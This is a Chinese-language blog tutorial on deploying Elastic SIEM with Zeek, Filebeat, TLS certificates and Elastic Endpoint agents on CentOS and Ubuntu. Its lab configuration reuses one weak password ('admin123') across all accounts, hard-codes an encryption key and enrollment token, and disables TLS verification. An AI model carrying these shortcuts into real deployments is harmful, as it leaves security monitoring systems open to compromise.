<!DOCTYPE html>
<html lang="zh-CN">










<head>
    <meta charset="utf-8" />
    <link rel="apple-touch-icon" sizes="76x76" href="/favicon.ico">
    <link rel="icon" type="image/png" href="/favicon.ico">
    <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0, shrink-to-fit=no" name="viewport" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="description" content="One way to choose one">
    <meta name="author" content="Misaki">
    <meta name="keywords" content="">
    <title>Elastic SIEM ~ Misaki&#39;s Blog</title>
    
<link rel="stylesheet" href="/css/Material_Icons.css">

    <!-- 
<link rel="stylesheet" href="/css/font-awesome.css">
 -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/latest/css/font-awesome.min.css">
    
<link rel="stylesheet" href="/css/main.css">

    
        
<link rel="stylesheet" href="/css/post.css">

        
            
<link rel="stylesheet" href="/css/Prettify/tomorrow-night-eighties.min.css">

        
    
<meta name="generator" content="Hexo 5.4.2"></head>

<body class=" sidebar-collapse">
<nav class="navbar navbar-transparent navbar-color-on-scroll fixed-top navbar-expand-lg" color-on-scroll="100" id="sectionsNav">
    <div class="container">
        <div class="navbar-translate">
            <a class="navbar-brand" href="/">
                Misaki&#39;s Blog</a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" aria-expanded="false" aria-label="Toggle navigation">
                <span class="sr-only">Toggle navigation</span>
                <span class="navbar-toggler-icon"></span>
                <span class="navbar-toggler-icon"></span>
                <span class="navbar-toggler-icon"></span>
            </button>
        </div>
            <div class="collapse navbar-collapse">
                <ul class="navbar-nav ml-auto">
                    
                        
                            <li class="nav-item">
                                <a class="nav-link" href="/archives/">
                                    archives
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" href="/about/">
                                    about
                                </a>
                            </li>
                        
                    
                    
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="https://github.com/MisakiKata" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-github"></i>
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="https://misakikata.github.io/atom.xml" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-rss"></i>
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="mailto:misakikatas@gmail.com" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-envelope"></i>
                                </a>
                            </li>
                        
                            <li class="nav-item">
                                <a class="nav-link" rel="tooltip" title="" data-placement="bottom" href="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/img/2022/12/29/10-47-19-8d33d040e42d9f086a13827162cc246a-下载-17fdcb.png" target="_blank" data-original-title="See me here">
                                    <i class="fa fa-comments"></i>
                                </a>
                            </li>
                        
                    
                </ul>
            </div>
    </div>
</nav>
    
  <div class="page-header header-filter" data-parallax="true" style="background-image: url('/img/post-banner.jpg'); height: 70vh;">
    
      <div class="container">
        <h1 class="title text-center post_title">Elastic SIEM</h1>
        <p class="text-center"><b>Friday, January 13th 2023, 10:34 am</b></p>
      </div>
    
  </div>

  
  
  
    <div class="row" style="margin: 0 0 0; z-index: 999;">
  <div class="col-md-8 offset-md-1">
    <div class="main main-raised">
      <div class="container">
        <div class="section">
          <div class="post_content">
              <h2 id="安装SIEM"><a href="#安装SIEM" class="headerlink" title="安装SIEM"></a>安装SIEM</h2><p>安全性资讯与事件 (SIEM) 是一种解决方案，可协助组织在威胁伤害企业运行之前，先进行侦测、分析和回应安全性威胁。以下使用centos7安装Elastic SIEM。</p>
<p>使用Ubuntu安装：<a target="_blank" rel="noopener" href="https://blog.csdn.net/UbuntuTouch/article/details/114023944">https://blog.csdn.net/UbuntuTouch/article/details/114023944</a></p>
<p><a target="_blank" rel="noopener" href="https://elasticstack.blog.csdn.net/article/details/112647180">https://elasticstack.blog.csdn.net/article/details/112647180</a></p>
<h3 id="安装Elasticsearch"><a href="#安装Elasticsearch" class="headerlink" title="安装Elasticsearch"></a>安装Elasticsearch</h3><p>创建RPM配置&#x2F;etc&#x2F;yum.repos.d&#x2F;elasticsearch.repo</p>
<pre class="line-numbers language-none"><code class="language-none">[elasticsearch]
name&#x3D;Elasticsearch repository for 7.x packages
baseurl&#x3D;https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;packages&#x2F;7.x&#x2F;yum
gpgcheck&#x3D;1
gpgkey&#x3D;https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;GPG-KEY-elasticsearch
enabled&#x3D;0
autorefresh&#x3D;1
type&#x3D;rpm-md<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>安装</p>
<pre class="line-numbers language-none"><code class="language-none">yum install --enablerepo&#x3D;elasticsearch elasticsearch<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>或者下载rpm文件</p>
<pre class="line-numbers language-none"><code class="language-none">wget https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;downloads&#x2F;elasticsearch&#x2F;elasticsearch-7.16.3-x86_64.rpm
sudo rpm --install elasticsearch-7.16.3-x86_64.rpm<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>修改&#x2F;etc&#x2F;elasticsearch&#x2F;elasticsearch.yml</p>
<pre class="line-numbers language-none"><code class="language-none">cluster.name: demo-elk
node.name: elk-1
network.host: 0.0.0.0
discovery.type: single-node<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>启动es</p>
<pre class="line-numbers language-none"><code class="language-none">service elasticsearch start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="安装kibana"><a href="#安装kibana" class="headerlink" title="安装kibana"></a>安装kibana</h3><p>同样创建配置&#x2F;etc&#x2F;yum.repos.d&#x2F;kibana.repo</p>
<pre class="line-numbers language-none"><code class="language-none">[kibana-7.x]
name&#x3D;Kibana repository for 7.x packages
baseurl&#x3D;https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;packages&#x2F;7.x&#x2F;yum
gpgcheck&#x3D;1
gpgkey&#x3D;https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;GPG-KEY-elasticsearch
enabled&#x3D;1
autorefresh&#x3D;1
type&#x3D;rpm-md<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>安装</p>
<pre class="line-numbers language-none"><code class="language-none">yum install kibana<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>或者下载rpm文件</p>
<pre class="line-numbers language-none"><code class="language-none">wget https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;downloads&#x2F;kibana&#x2F;kibana-7.16.3-x86_64.rpm
sudo rpm --install kibana-7.16.3-x86_64.rpm<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>编辑配置文件&#x2F;etc&#x2F;kibana&#x2F;kibana.yml</p>
<pre class="line-numbers language-none"><code class="language-none">server_port: 5601
server_host: 0.0.0.0
server_name: demo-kibana<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>启动</p>
<pre class="line-numbers language-none"><code class="language-none">service kibana start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="安装Filebeat"><a href="#安装Filebeat" class="headerlink" title="安装Filebeat"></a>安装Filebeat</h3><pre class="line-numbers language-none"><code class="language-none">yum install filebeat<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="安装-Zeek"><a href="#安装-Zeek" class="headerlink" title="安装 Zeek"></a>安装 Zeek</h3><p>一些需要的组件</p>
<pre class="line-numbers language-none"><code class="language-none">yum install cmake gcc-c++ gcc make flex bison swig python3 python3-devel<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>下载</p>
<pre class="line-numbers language-none"><code class="language-none">git clone --recursive https:&#x2F;&#x2F;github.com&#x2F;zeek&#x2F;zeek<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>配置环境</p>
<pre class="line-numbers language-none"><code class="language-none">.&#x2F;configure --prefix&#x3D;&#x2F;opt&#x2F;zeek<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>如果显示cmake版本不对，则去下载cmake</p>
<pre class="line-numbers language-none"><code class="language-none">wget https:&#x2F;&#x2F;cmake.org&#x2F;files&#x2F;v3.18&#x2F;cmake-3.18.6-Linux-x86_64.tar.gz -O &#x2F;opt&#x2F;
yum remove cmake
# 编辑环境变量写入
export CMAKE_HOME&#x3D;&#x2F;opt&#x2F;cmake
export PATH&#x3D;$PATH:$CMAKE_HOME&#x2F;bin
source &#x2F;etc&#x2F;profile
cmake -version<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>再此执行上面的命令如果报错<code>No CMAKE_CXX_COMPILER could be found</code>，安装gcc-c++</p>
<pre class="line-numbers language-none"><code class="language-none">yum install gcc-c++<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>如果报错 <code>Could NOT find ZLIB</code>，安装zlib</p>
<pre class="line-numbers language-none"><code class="language-none">wget http:&#x2F;&#x2F;www.zlib.net&#x2F;zlib-1.2.11.tar.gz
tar -xvzf zlib-1.2.11
.&#x2F;configure
make &amp;&amp; make install<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>如果报错 <code>Could not find prerequisite package &#39;PCAP&#39;</code>，安装libpcap</p>
<pre class="line-numbers language-none"><code class="language-none">wget https:&#x2F;&#x2F;www.tcpdump.org&#x2F;release&#x2F;libpcap-1.10.1.tar.gz
tar -zxvf libpcap-1.10.1.tar.gz
cd libpcap-1.10.1
.&#x2F;configure
make -j8
make install<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>如果报错<code>Could not find prerequisite package &#39;OpenSSL&#39;</code>，安装libssl</p>
<pre class="line-numbers language-none"><code class="language-none">yum install openssl-devel<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>如果提示GCC版本过低，scl源安装多版本gcc</p>
<pre class="line-numbers language-none"><code class="language-none">yum install centos-release-scl
yum install devtoolset-7-gcc*
scl enable devtoolset-7 bash<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>安装基本就可以成功，但是时间有点长，添加环境变量</p>
<pre class="line-numbers language-none"><code class="language-none">export PATH&#x3D;&#x2F;opt&#x2F;zeek&#x2F;bin:$PATH<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在 &#x2F;opt&#x2F;zeek&#x2F;etc 找到一个叫做 node.cfg 的配置文件。修改网卡名</p>
<pre class="line-numbers language-none"><code class="language-none">interface&#x3D;ens33<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>安装sendmail</p>
<pre class="line-numbers language-none"><code class="language-none">yum install sendmail<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>部署zeek</p>
<pre class="line-numbers language-none"><code class="language-none">zeekctl deploy<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在 &#x2F;opt&#x2F;zeek&#x2F;logs 目录里发现日志。“current” 目录保存当天的日志，而前几天的日志则存档到其自己的目录中。</p>
<h3 id="配置安全访问"><a href="#配置安全访问" class="headerlink" title="配置安全访问"></a>配置安全访问</h3><p>需要创建一个 YAML 文件 &#x2F;usr&#x2F;share&#x2F;elasticsearch&#x2F;instances.yml</p>
<pre class="line-numbers language-none"><code class="language-none">instances:
 - name: &quot;elasticsearch&quot;
   ip:&quot;192.168.0.4&quot;
 - name: &quot;kibana&quot;
   ip:&quot;192.168.0.4&quot;
 - name: &quot;zeek&quot;
   ip:&quot;192.168.0.4&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>运行生成证书</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;usr&#x2F;share&#x2F;elasticsearch&#x2F;bin&#x2F;elasticsearch-certutil cert ca --pem --in instances.yml --out certs.zip<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>如果报错，说明如下是格式对其上有问题</p>
<pre class="line-numbers language-none"><code class="language-none">expected &lt;block end&gt;, but found &#39;&lt;block mapping start&gt;&#39;
 in &#39;reader&#39;, line 3, column 3:
      ip: &quot;192.168.36.133&quot;
      ^<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>正常生成后，在运行解压缩</p>
<pre class="line-numbers language-none"><code class="language-none">unzip &#x2F;usr&#x2F;share&#x2F;elasticsearch&#x2F;certs.zip -d &#x2F;usr&#x2F;share&#x2F;elasticsearch&#x2F;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="配置-Elasticsearch-SSL"><a href="#配置-Elasticsearch-SSL" class="headerlink" title="配置 Elasticsearch SSL"></a>配置 Elasticsearch SSL</h3><p>创建一个文件夹将你的证书存储在我们的 Elasticsearch 主机上。</p>
<pre class="line-numbers language-none"><code class="language-none">mkdir &#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;ca -p<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>需要将解压缩的证书复制到其相关文件夹中并设置正确的权限。</p>
<pre class="line-numbers language-none"><code class="language-none">cp ca&#x2F;ca.crt &#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;ca
cp elasticsearch&#x2F;elasticsearch.crt &#x2F;etc&#x2F;elasticsearch&#x2F;certs
cp elasticsearch&#x2F;elasticsearch.key &#x2F;etc&#x2F;elasticsearch&#x2F;certs
chown -R elasticsearch: &#x2F;etc&#x2F;elasticsearch&#x2F;certs
chmod -R 770 &#x2F;etc&#x2F;elasticsearch&#x2F;certs<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>将 SSL 配置添加到我们的 &#x2F;etc&#x2F;elasticsearch&#x2F;elasticsearch.yml 文件</p>
<pre class="line-numbers language-none"><code class="language-none"># Transport layer
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.key: &#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;elasticsearch.key
xpack.security.transport.ssl.certificate: &#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;elasticsearch.crt
xpack.security.transport.ssl.certificate_authorities: [ &quot;&#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;ca&#x2F;ca.crt&quot; ]
  
# HTTP layer
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.verification_mode: certificate
xpack.security.http.ssl.key: &#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;elasticsearch.key
xpack.security.http.ssl.certificate: &#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;elasticsearch.crt
xpack.security.http.ssl.certificate_authorities: [ &quot;&#x2F;etc&#x2F;elasticsearch&#x2F;certs&#x2F;ca&#x2F;ca.crt&quot; ]<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>重新启动 Elasticsearch。</p>
<pre class="line-numbers language-none"><code class="language-none">service elasticsearch restart<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="配置-Kibana-SSL"><a href="#配置-Kibana-SSL" class="headerlink" title="配置 Kibana SSL"></a>配置 Kibana SSL</h3><p>配置证书</p>
<pre class="line-numbers language-none"><code class="language-none">mkdir &#x2F;etc&#x2F;kibana&#x2F;certs&#x2F;ca -p
cp ca&#x2F;ca.crt &#x2F;etc&#x2F;kibana&#x2F;certs&#x2F;ca
cp kibana&#x2F;kibana.crt &#x2F;etc&#x2F;kibana&#x2F;certs
cp kibana&#x2F;kibana.key &#x2F;etc&#x2F;kibana&#x2F;certs
chown -R kibana: &#x2F;etc&#x2F;kibana&#x2F;certs
chmod -R 770 &#x2F;etc&#x2F;kibana&#x2F;certs<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>文件 &#x2F;etc&#x2F;kibana&#x2F;kibana.yml</p>
<pre class="line-numbers language-none"><code class="language-none">elasticsearch.hosts: [&quot;https:&#x2F;&#x2F;192.168.36.133:9200&quot;]
elasticsearch.ssl.certificateAuthorities: [&quot;&#x2F;etc&#x2F;kibana&#x2F;certs&#x2F;ca&#x2F;ca.crt&quot;]
elasticsearch.ssl.certificate: &quot;&#x2F;etc&#x2F;kibana&#x2F;certs&#x2F;kibana.crt&quot;
elasticsearch.ssl.key: &quot;&#x2F;etc&#x2F;kibana&#x2F;certs&#x2F;kibana.key&quot;
​
#在 Kibana 和浏览器之间添加配置
server.ssl.enabled: true
server.ssl.certificate: &quot;&#x2F;etc&#x2F;kibana&#x2F;certs&#x2F;kibana.crt&quot;
server.ssl.key: &quot;&#x2F;etc&#x2F;kibana&#x2F;certs&#x2F;kibana.key&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>重新启动</p>
<pre class="line-numbers language-none"><code class="language-none">service kibana restart<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="配置-Beats-Zeek-SSL"><a href="#配置-Beats-Zeek-SSL" class="headerlink" title="配置 Beats (Zeek) SSL"></a>配置 Beats (Zeek) SSL</h3><p>首先将证书复制到运行 Zeek 的主机上，然后使用正确的权限创建证书目录。 您需要同时复制 Zeek 证书和 CA 证书。</p>
<pre class="line-numbers language-none"><code class="language-none">mkdir &#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;ca -p
cp ca&#x2F;ca.crt &#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;ca
cp zeek&#x2F;zeek.crt &#x2F;etc&#x2F;filebeat&#x2F;certs
cp zeek&#x2F;zeek.key &#x2F;etc&#x2F;filebeat&#x2F;certs
chmod 770 -R &#x2F;etc&#x2F;filebeat&#x2F;certs<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>修改配置&#x2F;etc&#x2F;filebeat&#x2F;filebeat.yml</p>
<pre class="line-numbers language-none"><code class="language-none">output.elasticsearch.hosts: [&#39;192.168.36.133:9200&#39;]
output.elasticsearch.protocol: https
output.elasticsearch.ssl.certificate: &quot;&#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;zeek.crt&quot;
output.elasticsearch.ssl.key: &quot;&#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;zeek.key&quot;
output.elasticsearch.ssl.certificate_authorities: [&quot;&#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;ca&#x2F;ca.crt&quot;]
​
setup.kibana:
  host: &quot;https:&#x2F;&#x2F;192.168.36.133:5601&quot;
  ssl.enabled: true
  ssl.certificate_authorities: [&quot;&#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;ca&#x2F;ca.crt&quot;]
  ssl.certificate: &quot;&#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;zeek.crt&quot;
  ssl.key: &quot;&#x2F;etc&#x2F;filebeat&#x2F;certs&#x2F;zeek.key&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>重启filebeat</p>
<pre class="line-numbers language-none"><code class="language-none">service filebeat restart<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>运行以下命令来检查 FileBeats 是否可以连接到 Elasticsearch。 一切都应该返回“OK”。</p>
<pre class="line-numbers language-none"><code class="language-none">filebeat test output<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>至此，如果想在Integrations添加集成模块，会提示不能添加，需要管理员设置，说明没有认证。</p>
<h3 id="添加身份验证"><a href="#添加身份验证" class="headerlink" title="添加身份验证"></a>添加身份验证</h3><p>编辑 &#x2F;etc&#x2F;elasticsearch&#x2F;elasticsearch.yml 启用安全</p>
<pre class="line-numbers language-none"><code class="language-none">xpack.security.enabled: true<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>重新启动 Elasticsearch:</p>
<pre class="line-numbers language-none"><code class="language-none">service elasticsearch restart<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>Elasticsearch 附带了一个工具来执行此操作。 运行以下命令以生成这些密码并将其保存在安全的地方</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;usr&#x2F;share&#x2F;elasticsearch&#x2F;bin&#x2F;elasticsearch-setup-passwords interactive<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>会设置多个账号密码，可以按照需要来修改，此处使用admin123，相同的设置。</p>
<p>这时候再去访问9200端口发现需要身份认证。同样kibana也不能访问，修改配置&#x2F;etc&#x2F;kibana&#x2F;kibana.yml</p>
<pre class="line-numbers language-none"><code class="language-none">elasticsearch.username: &quot;kibana_system&quot;
elasticsearch.password: &quot;admin123&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>重新启动 Kibana:</p>
<pre class="line-numbers language-none"><code class="language-none">service kibana restart<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>修改Filebeat 配置&#x2F;etc&#x2F;filebeat&#x2F;filebeat.yml</p>
<pre class="line-numbers language-none"><code class="language-none">output.elasticsearch.username: &quot;elastic&quot;
output.elasticsearch.password: &quot;admin123&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>重新启动 Filebeat:</p>
<pre class="line-numbers language-none"><code class="language-none">service filebeat restart<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<h3 id="安装证书"><a href="#安装证书" class="headerlink" title="安装证书"></a>安装证书</h3><p>链接显示不好安全链接，且本地不能验证证书，这里添加证书到本地验证，也就是生成的ca.cer添加到受信任的根证书机构中。</p>
<p><strong>Management &gt; Fleet</strong>。第一次访问此页面时，可能需要一分钟才能加载。</p>
<h3 id="添加-Zeek"><a href="#添加-Zeek" class="headerlink" title="添加 Zeek"></a>添加 Zeek</h3><p>添加 Zeek 数据到 Elasticsearch，在集成模块中选择Zeek Logs。</p>
<p>使用如下的命令来启动 zeek 模块：</p>
<pre class="line-numbers language-none"><code class="language-none">filebeat modules enable zeek<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>将 <code>@load policy/tuning/json-logs.zeek</code> 行编辑到文件 <code>/opt/zeek/share/zeek/site/local.zeek</code>中。</p>
<p>保存好文件，并重新启动 zeek:</p>
<pre class="line-numbers language-none"><code class="language-none">zeekctl deploy<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>现在检查日志是否为 JSON 格式。 即使你不熟悉 JSON，日志的格式也应该与以前明显不同。</p>
<pre class="line-numbers language-none"><code class="language-none">tail -f &#x2F;opt&#x2F;zeek&#x2F;logs&#x2F;current&#x2F;status.log<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>编辑配置文件 &#x2F;etc&#x2F;filebeat&#x2F;modules.d&#x2F;zeek.yml。对于 &#x2F;opt&#x2F;zeek&#x2F;logs&#x2F; 文件夹中的每个日志文件，必须定义 “current” 日志的路径以及以前的任何日志，如下所示，需要把配置中的全部都修改一下。</p>
<pre class="line-numbers language-none"><code class="language-none">dns:
  enabled: true
  var.paths: [ &quot;&#x2F;opt&#x2F;zeek&#x2F;logs&#x2F;current&#x2F;dns.log&quot;, &quot;&#x2F;opt&#x2F;zeek&#x2F;logs&#x2F;*.dns.json&quot; ]<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>不希望 Elasticsearch 提取这些文件，则只需将 “enabled” 字段设置为 false。 重要的是，将在 &#x2F;opt&#x2F;zeek&#x2F;logs中没有日志文件的所有日志源设置为 enabled: false，否则会收到错误消息。</p>
<p>启动 Filebeat 并启动该服务。</p>
<pre class="line-numbers language-none"><code class="language-none">sudo filebeat setup
sudo service filebeat restart<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>点击上面的 Zeek Overview 按钮, 我们将看到 Zeek 的信息</p>
<h3 id="启动检测"><a href="#启动检测" class="headerlink" title="启动检测"></a>启动检测</h3><p>security–Detections中点击View document。编辑你的 Kibana 配置件 &#x2F;etc&#x2F;kibana&#x2F;kibana.yml，然后添加 xpack.encryptedSavedObjects.encryptionKey。</p>
<pre class="line-numbers language-none"><code class="language-none">xpack.security.enabled: true
# xpack.fleet.agents.tlsCheckDisabled: true
xpack.encryptedSavedObjects.encryptionKey: &quot;something_at_least_32_characters&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>重新启动 Kibana：</p>
<pre class="line-numbers language-none"><code class="language-none">service kibana restart<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>经过上面的设置后，我们终于可以创建检测规则了。在Rules下的Create new rule。</p>
<h2 id="安装-Endpoint-agent"><a href="#安装-Endpoint-agent" class="headerlink" title="安装 Endpoint agent"></a>安装 Endpoint agent</h2><p>跟上面有些区别，但区别不大。先安装es和kibana。</p>
<pre class="line-numbers language-none"><code class="language-none">wget https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;downloads&#x2F;elasticsearch&#x2F;elasticsearch-7.16.3-amd64.deb
sudo dpkg -i elasticsearch-7.16.3-amd64.deb
wget https:&#x2F;&#x2F;artifacts.elastic.co&#x2F;downloads&#x2F;kibana&#x2F;kibana-7.16.3-amd64.deb
sudo dpkg -i kibana-7.16.3-amd64.deb<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>修改es配置&#x2F;etc&#x2F;elasticsearch&#x2F;elasticsearch.yml</p>
<pre class="line-numbers language-none"><code class="language-none">network.host: 0.0.0.0
discovery.type: single-node
xpack.security.enabled: true
xpack.security.authc.api_key.enabled: true<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p>启动es</p>
<pre class="line-numbers language-none"><code class="language-none">sudo service elasticsearch start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>需要先设置密码</p>
<pre class="line-numbers language-none"><code class="language-none">sudo &#x2F;usr&#x2F;share&#x2F;elasticsearch&#x2F;bin&#x2F;elasticsearch-setup-passwords interactive<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>修改kibana配置&#x2F;etc&#x2F;kibana&#x2F;kibana.yml</p>
<pre class="line-numbers language-none"><code class="language-none">server.host: &quot;192.168.36.135&quot;
elasticsearch.username: &quot;kibana_system&quot;
elasticsearch.password: &quot;admin123&quot;
xpack.security.enabled: true
xpack.fleet.agents.tlsCheckDisabled: true
xpack.encryptedSavedObjects.encryptionKey: &quot;AE3CA37A74386E07E471EEB842720384&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>启动kibana</p>
<pre class="line-numbers language-none"><code class="language-none">sudo service kibana start<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>7.11.1</p>
<p>然后在security选项中选择Fleet，在页面Add Fleet Server integration下配置规则。</p>
<p>点击create new policy创建规则。</p>
<p>选择后点击save，在Agent policies下的规则内点击add agent。</p>
<p>下载agent:<a target="_blank" rel="noopener" href="https://www.elastic.co/cn/downloads/past-releases/elastic-agent-7-11-1">https://www.elastic.co/cn/downloads/past-releases/elastic-agent-7-11-1</a></p>
<p>运行的时候那个命令可能缺个参数–insecure，</p>
<pre class="line-numbers language-none"><code class="language-none">sudo .&#x2F;elastic-agent install --insecure -f --kibana-url&#x3D;http:&#x2F;&#x2F;192.168.36.135:5601 --enrollment-token&#x3D;WmJhTm5uNEJBbmthYjZpY0ZyZ2M6NktXX3NHbU5UUTJlZlhZTGc2QlVVdw&#x3D;&#x3D;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>agent端显示healthy表示安装正常。</p>
<p>7.16.3</p>
<p>刚开始启动的时候可能需要一点时间，才能访问页面。输入设定好的账号密码。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-197290480619c081af3e71cff0f2b8e6-image-20220207152716004-57d4f1.png" alt="image-20220207152716004"></p>
<p>先在Integrations下选择endpoint security，点击右上角的ADD endpoint security。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-89f0cea03a022964e5712763fa95e0cf-image-20220207153026139-5c1eda.png" alt="image-20220207153026139"></p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-4dbdbf1757682e5819fd1177c4a173e0-image-20220207153039583-88460b.png" alt="image-20220207153039583"></p>
<p>跳转到Fleet页面，这个页面加载估计需要一分钟左右，创建Configure integration，设置集成名。点击下面的创建agent规则，或者使用默认规则。</p>
<p><img src="https://github-1300513062.cos.ap-shanghai.myqcloud.com/img/2023/01/13/10-33-00-d5ff547b338485af5b53130554d5dce3-image-20220207153208610-b9a876.png" alt="image-20220207153208610"></p>
<p>关闭了收集agent日志</p>
